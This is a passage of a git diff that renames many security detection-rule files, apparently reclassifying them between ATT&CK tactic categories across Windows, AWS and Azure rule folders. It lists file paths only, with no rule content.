initial_access_via_explorer_suspicious_child_parent_args.toml} (100%) rename rules/windows/{execution_webshell_screenconnect_server.toml => initial_access_webshell_screenconnect_server.toml} (100%) rename rules/windows/{defense_evasion_xsl_script_execution_via_com.toml => initial_access_xsl_script_execution_via_com.toml} (100%) rename rules/windows/{defense_evasion_alternate_creds_pth.toml => lateral_movement_alternate_creds_pth.toml} (100%) rename rules/windows/{execution_cmd_service.toml => lateral_movement_cmd_service.toml} (100%) rename rules/windows/{defense_evasion_dcom_mmc20.toml => lateral_movement_dcom_mmc20.toml} (100%) rename rules/windows/{execution_dcom_shellwindow_shellbrowserwindow.toml => lateral_movement_dcom_shellwindow_shellbrowserwindow.toml} (100%) rename rules/windows/{execution_incoming_wmi.toml => lateral_movement_incoming_wmi.toml} (100%) rename rules/windows/{defense_evasion_rdp_enabled_registry.toml => lateral_movement_rdp_enabled_registry.toml} (100%) rename rules/windows/{execution_remote_services.toml => lateral_movement_remote_services.toml} (100%) rename rules/windows/{execution_remote_task_creation_winlog.toml => lateral_movement_remote_task_creation_winlog.toml} (100%) rename rules/windows/{execution_scheduled_task_target.toml => lateral_movement_scheduled_task_target.toml} (100%) rename rules/windows/{initial_access_unusual_dns_service_children.toml => lateral_movement_unusual_dns_service_children.toml} (100%) rename rules/windows/{initial_access_unusual_dns_service_file_writes.toml => lateral_movement_unusual_dns_service_file_writes.toml} (100%) rename rules/windows/{execution_via_wsus_update.toml => lateral_movement_via_wsus_update.toml} (100%) rename rules/windows/{defense_evasion_evasion_hidden_local_account_creation.toml => persistence_evasion_hidden_local_account_creation.toml} (100%) rename rules/windows/{defense_evasion_evasion_registry_startup_shell_folder_modified.toml => persistence_evasion_registry_startup_shell_folder_modified.toml} (100%) rename rules/windows/{defense_evasion_msi_installer_task_startup.toml => persistence_msi_installer_task_startup.toml} (100%) rename rules/windows/{defense_evasion_sdprop_exclusion_dsheuristics.toml => persistence_sdprop_exclusion_dsheuristics.toml} (100%) rename rules/windows/{defense_evasion_services_registry.toml => persistence_services_registry.toml} (100%) rename rules/windows/{execution_suspicious_scheduled_task_runtime.toml => persistence_suspicious_scheduled_task_runtime.toml} (100%) rename rules/windows/{execution_system_shells_via_services.toml => persistence_system_shells_via_services.toml} (100%) rename rules/windows/{execution_temp_scheduled_task.toml => persistence_temp_scheduled_task.toml} (100%) rename rules/windows/{defense_evasion_via_bits_job_notify_command.toml => persistence_via_bits_job_notify_command.toml} (100%) rename rules/windows/{defense_evasion_via_hidden_run_key_valuename.toml => persistence_via_hidden_run_key_valuename.toml} (100%) rename rules/windows/{execution_via_wmi_stdregprov_run_services.toml => persistence_via_wmi_stdregprov_run_services.toml} (100%) rename rules/windows/{execution_via_xp_cmdshell_mssql_stored_procedure.toml => persistence_via_xp_cmdshell_mssql_stored_procedure.toml} (100%) rename rules/windows/{execution_webshell_detection.toml => persistence_webshell_detection.toml} (100%) rename rules/windows/{initial_access_account_takeover_mixed_logon_types.toml => privilege_escalation_account_takeover_mixed_logon_types.toml} (100%) rename rules/windows/{persistence_badsuccessor_dmsa_abuse.toml => privilege_escalation_badsuccessor_dmsa_abuse.toml} (100%) rename rules/windows/{defense_evasion_create_process_as_different_user.toml => privilege_escalation_create_process_as_different_user.toml} (100%) rename rules/windows/{defense_evasion_create_process_with_token_unpriv.toml => privilege_escalation_create_process_with_token_unpriv.toml} (100%) rename rules/windows/{persistence_credroaming_ldap.toml => privilege_escalation_credroaming_ldap.toml} (100%) rename rules/windows/{defense_evasion_disable_uac_registry.toml => privilege_escalation_disable_uac_registry.toml} (100%) rename rules/windows/{persistence_dmsa_creation_by_unusual_user.toml => privilege_escalation_dmsa_creation_by_unusual_user.toml} (100%) rename rules/windows/{persistence_dns_serverlevelplugindll.toml => privilege_escalation_dns_serverlevelplugindll.toml} (100%) rename rules/windows/{defense_evasion_expired_driver_loaded.toml => privilege_escalation_expired_driver_loaded.toml} (100%) rename rules/windows/{persistence_gpo_schtask_service_creation.toml => privilege_escalation_gpo_schtask_service_creation.toml} (100%) rename rules/windows/{persistence_group_policy_iniscript.toml => privilege_escalation_group_policy_iniscript.toml} (100%) rename rules/windows/{execution_group_policy_scheduled_task.toml => privilege_escalation_group_policy_scheduled_task.toml} (100%) rename rules/windows/{defense_evasion_krbrelayup_service_creation.toml => privilege_escalation_krbrelayup_service_creation.toml} (100%) rename rules/windows/{persistence_lsa_auth_package.toml => privilege_escalation_lsa_auth_package.toml} (100%) rename rules/windows/{defense_evasion_make_token_local.toml => privilege_escalation_make_token_local.toml} (100%) rename rules/windows/{defense_evasion_newcreds_logon_rare_process.toml => privilege_escalation_newcreds_logon_rare_process.toml} (100%) rename rules/windows/{persistence_port_monitor_print_processor_abuse.toml => privilege_escalation_port_monitor_print_processor_abuse.toml} (100%) rename rules/windows/{defense_evasion_posh_token_impersonation.toml => privilege_escalation_posh_token_impersonation.toml} (100%) rename rules/windows/{defense_evasion_printspooler_suspicious_file_deletion.toml => privilege_escalation_printspooler_suspicious_file_deletion.toml} (100%) rename rules/windows/{persistence_reg_service_imagepath_mod.toml => privilege_escalation_reg_service_imagepath_mod.toml} (100%) rename rules/windows/{execution_service_control_spawned_script_int.toml => privilege_escalation_service_control_spawned_script_int.toml} (100%) rename rules/windows/{initial_access_takeover_new_source_ip.toml => privilege_escalation_takeover_new_source_ip.toml} (100%) rename rules/windows/{defense_evasion_tokenmanip_sedebugpriv_enabled.toml => privilege_escalation_tokenmanip_sedebugpriv_enabled.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_com_clipup.toml => privilege_escalation_uac_bypass_com_clipup.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_com_ieinstal.toml => privilege_escalation_uac_bypass_com_ieinstal.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_com_interface_icmluautil.toml => privilege_escalation_uac_bypass_com_interface_icmluautil.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_diskcleanup_hijack.toml => privilege_escalation_uac_bypass_diskcleanup_hijack.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_dll_sideloading.toml => privilege_escalation_uac_bypass_dll_sideloading.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_event_viewer.toml => privilege_escalation_uac_bypass_event_viewer.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_mock_windir.toml => privilege_escalation_uac_bypass_mock_windir.toml} (100%) rename rules/windows/{defense_evasion_uac_bypass_winfw_mmc_hijack.toml => privilege_escalation_uac_bypass_winfw_mmc_hijack.toml} (100%) rename rules/windows/{defense_evasion_unusual_parentchild_relationship.toml => privilege_escalation_unusual_parentchild_relationship.toml} (100%) rename rules/windows/{defense_evasion_unusual_svchost_childproc_childless.toml => privilege_escalation_unusual_svchost_childproc_childless.toml} (100%) rename rules/windows/{defense_evasion_via_token_theft.toml => privilege_escalation_via_token_theft.toml} (100%) rename rules/windows/{persistence_windows_service_via_unusual_client.toml => privilege_escalation_windows_service_via_unusual_client.toml} (100%) rename rules_building_block/{defense_evasion_bitsadmin_activity.toml => command_and_control_bitsadmin_activity.toml} (100%) rename rules_building_block/{initial_access_entra_id_risk_detection_signal.toml => credential_access_entra_id_risk_detection_signal.toml} (100%) rename rules_building_block/{defense_evasion_mdmp_file_unusual_extension.toml => credential_access_mdmp_file_unusual_extension.toml} (100%) rename rules_building_block/{execution_download_susp_extension.toml => defense_evasion_download_susp_extension.toml} (100%) rename rules_building_block/{execution_injection_from_msoffice.toml => defense_evasion_injection_from_msoffice.toml} (100%) rename rules_building_block/{execution_outlook_suspicious_child.toml => defense_evasion_outlook_suspicious_child.toml} (100%) rename rules_building_block/{persistence_service_path_registry.toml => defense_evasion_service_path_registry.toml} (100%) rename rules_building_block/{persistence_services_exe_path.toml => defense_evasion_services_exe_path.toml} (100%) rename rules_building_block/{persistence_write_dac_access.toml => defense_evasion_write_dac_access.toml} (100%) rename rules_building_block/{credential_access_capnetraw_capability.toml => discovery_capnetraw_capability.toml} (100%) rename rules_building_block/{persistence_linux_modprobe_enumeration.toml => discovery_linux_modprobe_enumeration.toml} (100%) rename rules_building_block/{defense_evasion_linux_sysctl_enumeration.toml => discovery_linux_sysctl_enumeration.toml} (100%) rename rules_building_block/{persistence_github_new_event_action_for_pat.toml => execution_github_new_event_action_for_pat.toml} (100%) rename rules_building_block/{collection_github_new_repo_interaction_for_pat.toml => execution_github_new_repo_interaction_for_pat.toml} (100%) rename rules_building_block/{collection_github_new_repo_interaction_for_user.toml => execution_github_new_repo_interaction_for_user.toml} (100%) rename rules_building_block/{resource_development_github_repo_created.toml => execution_github_repo_created.toml} (100%) rename rules_building_block/{collection_github_repo_interaction_from_new_ip.toml => execution_github_repo_interaction_from_new_ip.toml} (100%) rename rules_building_block/{defense_evasion_settingcontent_ms_file_creation.toml => execution_settingcontent_ms_file_creation.toml} (100%) rename rules_building_block/{execution_anomalous_rsc_flight_data_patterns.toml => initial_access_anomalous_rsc_flight_data_patterns.toml} (100%) rename rules_building_block/{defense_evasion_github_new_ip_address_for_pat.toml => initial_access_github_new_ip_address_for_pat.toml} (100%) rename rules_building_block/{credential_access_okta_admin_console_login_failure.toml => initial_access_okta_admin_console_login_failure.toml} (100%) rename rules_building_block/{execution_at.toml => lateral_movement_at.toml} (100%) rename rules_building_block/{execution_posh_winrm_activity.toml => lateral_movement_posh_winrm_activity.toml} (100%) rename rules_building_block/{execution_unusual_process_sql_accounts.toml => lateral_movement_unusual_process_sql_accounts.toml} (100%) rename rules_building_block/{execution_wmic_remote.toml => lateral_movement_wmic_remote.toml} (100%) rename rules_building_block/{defense_evasion_github_new_pat_for_user.toml => persistence_github_new_pat_for_user.toml} (100%) rename rules_building_block/{initial_access_web_server_potential_sql_injection.toml => persistence_web_server_potential_sql_injection.toml} (100%) rename rules_building_block/{defense_evasion_sts_getsessiontoken_abuse.toml => privilege_escalation_sts_getsessiontoken_abuse.toml} (100%) diff --git a/rules/cross-platform/persistence_genai_config_modification.toml b/rules/cross-platform/defense_evasion_genai_config_modification.toml similarity index 100% rename from rules/cross-platform/persistence_genai_config_modification.toml rename to rules/cross-platform/defense_evasion_genai_config_modification.toml diff --git a/rules/cross-platform/resource_development_genai_process_compiling_executables.toml b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml similarity index 100% rename from rules/cross-platform/resource_development_genai_process_compiling_executables.toml rename to rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml diff --git a/rules/cross-platform/collection_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml similarity index 100% rename from rules/cross-platform/collection_genai_process_encoding_prior_to_network_activity.toml rename to rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml diff --git a/rules/cross-platform/defense_evasion_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml similarity index 100% rename from rules/cross-platform/defense_evasion_virtual_machine_fingerprinting_grep.toml rename to rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml diff --git a/rules/cross-platform/collection_azure_o365_with_network_alert.toml b/rules/cross-platform/initial_access_azure_o365_with_network_alert.toml similarity index 100% rename from rules/cross-platform/collection_azure_o365_with_network_alert.toml rename to rules/cross-platform/initial_access_azure_o365_with_network_alert.toml diff --git a/rules/cross-platform/initial_access_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml similarity index 100% rename from rules/cross-platform/initial_access_web_server_potential_command_injection.toml rename to rules/cross-platform/persistence_web_server_potential_command_injection.toml diff --git a/rules/cross-platform/persistence_trap_execution.toml b/rules/cross-platform/privilege_escalation_trap_execution.toml similarity index 100% rename from rules/cross-platform/persistence_trap_execution.toml rename to rules/cross-platform/privilege_escalation_trap_execution.toml diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_created.toml b/rules/integrations/aws/collection_cloudtrail_logging_created.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_cloudtrail_logging_created.toml rename to rules/integrations/aws/collection_cloudtrail_logging_created.toml diff --git a/rules/integrations/aws/persistence_iam_user_addition_to_group.toml b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml similarity index 100% rename from rules/integrations/aws/persistence_iam_user_addition_to_group.toml rename to rules/integrations/aws/credential_access_iam_user_addition_to_group.toml diff --git a/rules/integrations/aws/collection_rds_instance_restored.toml b/rules/integrations/aws/defense_evasion_rds_instance_restored.toml similarity index 100% rename from rules/integrations/aws/collection_rds_instance_restored.toml rename to rules/integrations/aws/defense_evasion_rds_instance_restored.toml diff --git a/rules/integrations/aws/impact_s3_bucket_lifecycle_expiration_added.toml b/rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml similarity index 100% rename from rules/integrations/aws/impact_s3_bucket_lifecycle_expiration_added.toml rename to rules/integrations/aws/defense_evasion_s3_bucket_lifecycle_expiration_added.toml diff --git a/rules/integrations/aws/impact_sqs_purge_queue.toml b/rules/integrations/aws/defense_evasion_sqs_purge_queue.toml similarity index 100% rename from rules/integrations/aws/impact_sqs_purge_queue.toml rename to rules/integrations/aws/defense_evasion_sqs_purge_queue.toml diff --git a/rules/integrations/aws/persistence_sts_get_federation_token.toml b/rules/integrations/aws/defense_evasion_sts_get_federation_token.toml similarity index 100% rename from rules/integrations/aws/persistence_sts_get_federation_token.toml rename to rules/integrations/aws/defense_evasion_sts_get_federation_token.toml diff --git a/rules/integrations/aws/defense_evasion_lambda_external_layer_added_to_function.toml b/rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_lambda_external_layer_added_to_function.toml rename to rules/integrations/aws/execution_lambda_external_layer_added_to_function.toml diff --git a/rules/integrations/aws/collection_dynamodb_scan_by_unusual_user.toml b/rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml similarity index 100% rename from rules/integrations/aws/collection_dynamodb_scan_by_unusual_user.toml rename to rules/integrations/aws/exfiltration_dynamodb_scan_by_unusual_user.toml diff --git a/rules/integrations/aws/discovery_ec2_full_network_packet_capture_detected.toml b/rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml similarity index 100% rename from rules/integrations/aws/discovery_ec2_full_network_packet_capture_detected.toml rename to rules/integrations/aws/exfiltration_ec2_full_network_packet_capture_detected.toml diff --git a/rules/integrations/aws/collection_rds_snapshot_export.toml b/rules/integrations/aws/exfiltration_rds_snapshot_export.toml similarity index 100% rename from rules/integrations/aws/collection_rds_snapshot_export.toml rename to rules/integrations/aws/exfiltration_rds_snapshot_export.toml diff --git a/rules/integrations/aws/persistence_s3_bucket_policy_added_for_external_account_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml similarity index 100% rename from rules/integrations/aws/persistence_s3_bucket_policy_added_for_external_account_access.toml rename to rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_external_account_access.toml diff --git a/rules/integrations/aws/defense_evasion_s3_bucket_policy_added_for_public_access.toml b/rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_s3_bucket_policy_added_for_public_access.toml rename to rules/integrations/aws/exfiltration_s3_bucket_policy_added_for_public_access.toml diff --git a/rules/integrations/aws/defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml rename to rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml diff --git a/rules/integrations/aws/discovery_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml similarity index 100% rename from rules/integrations/aws/discovery_aws_s3_bucket_enumeration_or_brute_force.toml rename to rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_updated.toml b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_cloudtrail_logging_updated.toml rename to rules/integrations/aws/impact_cloudtrail_logging_updated.toml diff --git a/rules/integrations/aws/defense_evasion_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_cloudwatch_log_group_deletion.toml rename to rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml diff --git a/rules/integrations/aws/defense_evasion_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_cloudwatch_log_stream_deletion.toml rename to rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml diff --git a/rules/integrations/aws/defense_evasion_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_ec2_disable_ebs_encryption.toml rename to rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml diff --git a/rules/integrations/aws/defense_evasion_iam_deactivate_mfa_device.toml b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_iam_deactivate_mfa_device.toml rename to rules/integrations/aws/impact_iam_deactivate_mfa_device.toml diff --git a/rules/integrations/aws/defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_rds_instance_cluster_deletion_protection_disabled.toml rename to rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml diff --git a/rules/integrations/aws/persistence_ec2_instance_connect_ssh_public_key_uploaded.toml b/rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml similarity index 100% rename from rules/integrations/aws/persistence_ec2_instance_connect_ssh_public_key_uploaded.toml rename to rules/integrations/aws/lateral_movement_ec2_instance_connect_ssh_public_key_uploaded.toml diff --git a/rules/integrations/aws/initial_access_ec2_instance_console_login.toml b/rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml similarity index 100% rename from rules/integrations/aws/initial_access_ec2_instance_console_login.toml rename to rules/integrations/aws/lateral_movement_ec2_instance_console_login.toml diff --git a/rules/integrations/aws/exfiltration_sns_topic_message_publish_by_rare_user.toml b/rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml similarity index 100% rename from rules/integrations/aws/exfiltration_sns_topic_message_publish_by_rare_user.toml rename to rules/integrations/aws/lateral_movement_sns_topic_message_publish_by_rare_user.toml diff --git a/rules/integrations/aws/defense_evasion_ec2_network_acl_creation.toml b/rules/integrations/aws/persistence_ec2_network_acl_creation.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_ec2_network_acl_creation.toml rename to rules/integrations/aws/persistence_ec2_network_acl_creation.toml diff --git a/rules/integrations/aws/defense_evasion_ec2_route_table_modified_or_deleted.toml b/rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_ec2_route_table_modified_or_deleted.toml rename to rules/integrations/aws/persistence_ec2_route_table_modified_or_deleted.toml diff --git a/rules/integrations/aws/defense_evasion_ec2_security_group_configuration_change_detection.toml b/rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_ec2_security_group_configuration_change_detection.toml rename to rules/integrations/aws/persistence_ec2_security_group_configuration_change_detection.toml diff --git a/rules/integrations/aws/defense_evasion_iam_api_calls_via_user_session_token.toml b/rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_iam_api_calls_via_user_session_token.toml rename to rules/integrations/aws/persistence_iam_api_calls_via_user_session_token.toml diff --git a/rules/integrations/aws/privilege_escalation_iam_oidc_provider_created.toml b/rules/integrations/aws/persistence_iam_oidc_provider_created.toml similarity index 100% rename from rules/integrations/aws/privilege_escalation_iam_oidc_provider_created.toml rename to rules/integrations/aws/persistence_iam_oidc_provider_created.toml diff --git a/rules/integrations/aws/defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_lambda_backdoor_invoke_function_for_any_principal.toml rename to rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml diff --git a/rules/integrations/aws/defense_evasion_rds_instance_made_public.toml b/rules/integrations/aws/persistence_rds_instance_made_public.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_rds_instance_made_public.toml rename to rules/integrations/aws/persistence_rds_instance_made_public.toml diff --git a/rules/integrations/aws/defense_evasion_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_route_53_domain_transfer_lock_disabled.toml rename to rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml diff --git a/rules/integrations/aws/resource_development_route_53_domain_transferred_to_another_account.toml b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml similarity index 100% rename from rules/integrations/aws/resource_development_route_53_domain_transferred_to_another_account.toml rename to rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml diff --git a/rules/integrations/aws/defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml rename to rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml diff --git a/rules/integrations/aws/defense_evasion_route_table_created.toml b/rules/integrations/aws/persistence_route_table_created.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_route_table_created.toml rename to rules/integrations/aws/persistence_route_table_created.toml diff --git a/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml similarity index 100% rename from rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_group.toml rename to rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml diff --git a/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml similarity index 100% rename from rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_role.toml rename to rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml diff --git a/rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml similarity index 100% rename from rules/integrations/aws/persistence_iam_administratoraccess_policy_attached_to_user.toml rename to rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml diff --git a/rules/integrations/aws/persistence_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml similarity index 100% rename from rules/integrations/aws/persistence_iam_customer_managed_policy_attached_to_role.toml rename to rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml diff --git a/rules/integrations/aws/defense_evasion_iam_saml_provider_updated.toml b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml similarity index 100% rename from rules/integrations/aws/defense_evasion_iam_saml_provider_updated.toml rename to rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml diff --git a/rules/integrations/aws/persistence_iam_update_assume_role_policy.toml b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml similarity index 100% rename from rules/integrations/aws/persistence_iam_update_assume_role_policy.toml rename to rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml diff --git a/rules/integrations/aws/persistence_sts_role_chaining.toml b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml similarity index 100% rename from rules/integrations/aws/persistence_sts_role_chaining.toml rename to rules/integrations/aws/privilege_escalation_sts_role_chaining.toml diff --git a/rules/integrations/aws/impact_sns_topic_created_by_rare_user.toml b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml similarity index 100% rename from rules/integrations/aws/impact_sns_topic_created_by_rare_user.toml rename to rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml diff --git a/rules/integrations/azure/collection_key_vault_excessive_retrieval.toml b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml similarity index 100% rename from rules/integrations/azure/collection_key_vault_excessive_retrieval.toml rename to rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml diff --git a/rules/integrations/azure/persistence_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml similarity index 100% rename from rules/integrations/azure/persistence_storage_account_key_regenerated.toml rename to rules/integrations/azure/credential_access_storage_account_key_regenerated.toml diff --git a/rules/integrations/azure/credential_access_entra_id_teamfiltration_user_agents_detected.toml b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml similarity index 100% rename from rules/integrations/azure/credential_access_entra_id_teamfiltration_user_agents_detected.toml rename to rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml diff --git a/rules/integrations/azure/defense_evasion_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_storage_blob_container_access_modification.toml rename to rules/integrations/azure/discovery_storage_blob_container_access_modification.toml diff --git a/rules/integrations/azure/collection_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml similarity index 100% rename from rules/integrations/azure/collection_azure_storage_blob_download_azcopy_sas_token.toml rename to rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml diff --git a/rules/integrations/azure/credential_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml similarity index 100% rename from rules/integrations/azure/credential_access_azure_arc_cluster_credential_access_unusual_source.toml rename to rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_actor_token_user_impersonation_abuse.toml rename to rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_device_code_auth_with_broker_client.toml rename to rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml diff --git a/rules/integrations/azure/persistence_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml similarity index 100% rename from rules/integrations/azure/persistence_entra_id_external_guest_user_invite.toml rename to rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_federated_login_by_unusual_client.toml rename to rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_graph_single_session_from_multiple_addresses.toml rename to rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml diff --git a/rules/integrations/azure/credential_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml similarity index 100% rename from rules/integrations/azure/credential_access_entra_id_illicit_consent_grant_via_registered_application.toml rename to rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml diff --git a/rules/integrations/azure/credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml similarity index 100% rename from rules/integrations/azure/credential_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml rename to rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml diff --git a/rules/integrations/azure/credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml similarity index 100% rename from rules/integrations/azure/credential_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml rename to rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml diff --git a/rules/integrations/azure/credential_access_entra_id_protection_sign_in_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml similarity index 100% rename from rules/integrations/azure/credential_access_entra_id_protection_sign_in_risk_detected.toml rename to rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml diff --git a/rules/integrations/azure/defense_evasion_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml similarity index 100% rename from rules/integrations/azure/defense_evasion_entra_id_rare_app_id_for_principal_auth.toml rename 